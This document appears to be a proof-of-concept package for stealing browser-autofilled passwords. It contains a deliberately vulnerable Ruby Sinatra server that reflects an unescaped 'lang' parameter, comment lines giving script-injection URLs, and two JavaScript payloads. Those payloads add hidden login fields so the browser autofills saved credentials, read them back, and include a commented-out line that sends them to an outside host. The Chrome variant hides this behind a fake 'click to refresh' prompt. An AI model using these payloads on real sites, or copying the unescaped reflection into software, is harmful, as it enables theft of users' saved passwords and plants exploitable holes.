Autocomplete Password Stealing PoC (FF & Chrome)

server.rb

#!/usr/bin/env ruby

require 'rubygems'
require 'thin'
require 'rack'
require 'sinatra'

# python -m SimpleHTTPServer
# ruby ./server
# http://127.0.0.1:4000/?lang='><script>alert()</script>
# http://127.0.0.1:4000/?lang='><script src="http://127.0.0.1:8000/stealCreds-innerHTML.js"></script>
# http://127.0.0.1:4000/?lang='><script src="http://127.0.0.1:8000/stealCreds-onClick.js"></script><!--

class InjectDemo < Sinatra::Base

get "/login" do
"
<form method='POST' action='/'>
Username: <input id='username' type='text' value='' /><br />
Password: <input id='password' type='password' value='' /><br />
<input type='submit' value='Submit' submit='/' />
</form>
"
  end

get "/" do
  lang = request['lang'] || "en_US";
"
<div align=center>
To login, go to the login page at
<a href='http://127.0.0.1:4000/login?lang=#{lang}'>http://127.0.0.1/login</a>
</div>
"
  end

post "/" do
"
<meta http-equiv='refresh' content='1;url='http://127.0.0.1:4000'>
"
  end
end

@routes = {
  "/" => InjectDemo.new
}

@rack_app = Rack::URLMap.new(@routes)
@thin = Thin::Server.new("127.0.0.1", 4000, @rack_app)

Thin::Logging.silent = true
Thin::Logging.debug = false

puts "[#{Time.now}] Thin ready"
@thin.start

stealCreds-innerHTML.js

/* Autocomplete Password Stealing for Firefox */

// Configuration
user_id = "username";
pass_id = "password";

remembered = ''; // Stored UserName
// End of configuration

function stealCreds() {
	un = pw = "";
	un = document.getElementById(user_id).value;
	pw = document.getElementById(pass_id).value;

	// new Image().src = "http://example.com/?" + un + "-" + pw;
	console.log(un + "-" + pw);
	window.clearInterval(check);
}

function appendDiv() {
	var div = document.createElement("div");
	div.id = 'myform';
	div.innerHTML = "<input type='text' name='" + user_id + "' id='" + user_id + "' value='" + remembered + "' autocomplete='on'>" + 
	                "<input type='password' name='" + pass_id + "' id='" + pass_id + "' value='' autocomplete='on'>";

	document.getElementsByTagName("body")[0].appendChild(div);
	document.getElementById('myform').style.visibility = 'hidden';
}
	
appendDiv();
check = window.setInterval("stealCreds();", 2000);

stealCreds-onClick.js

/* Autocomplete Password Stealing for Chrome */

// Configuration
user_id = "username";
pass_id = "password";

remembered = ''; // Stored UserName
message = "<b>Please click here to refresh</b>";
redirect_to = 'http://127.0.0.1:4000'
// End of configuration

function stealCreds() {
	un = pw = "";
	un = document.getElementById(user_id).value;	
	pw = document.getElementById(pass_id).value;

	// new Image().src = "http://example.com/?" + un + "-" + pw;
	console.log(un + "-" + pw);
}

function appendDiv() {
	var div = document.createElement("div");
	div.id = 'myform';
	div.innerHTML = "<input type='text' name='" + user_id + "' id='" + user_id + "' value='" + remembered + "' autocomplete='on'>" + 
	                "<input type='password' name='" + pass_id + "' id='" + pass_id + "' value='' autocomplete='on'>";

	document.getElementsByTagName("body")[0].appendChild(div);
	document.getElementById('myform').style.visibility = 'hidden';
}

function showMsg() {
	var p = document.createElement("p");
	p.innerHTML = message;
	document.getElementsByTagName("body")[0].appendChild(p);
}

appendDiv();
showMsg();

window.onclick = function() {
	stealCreds();
	document.location = redirect_to;
}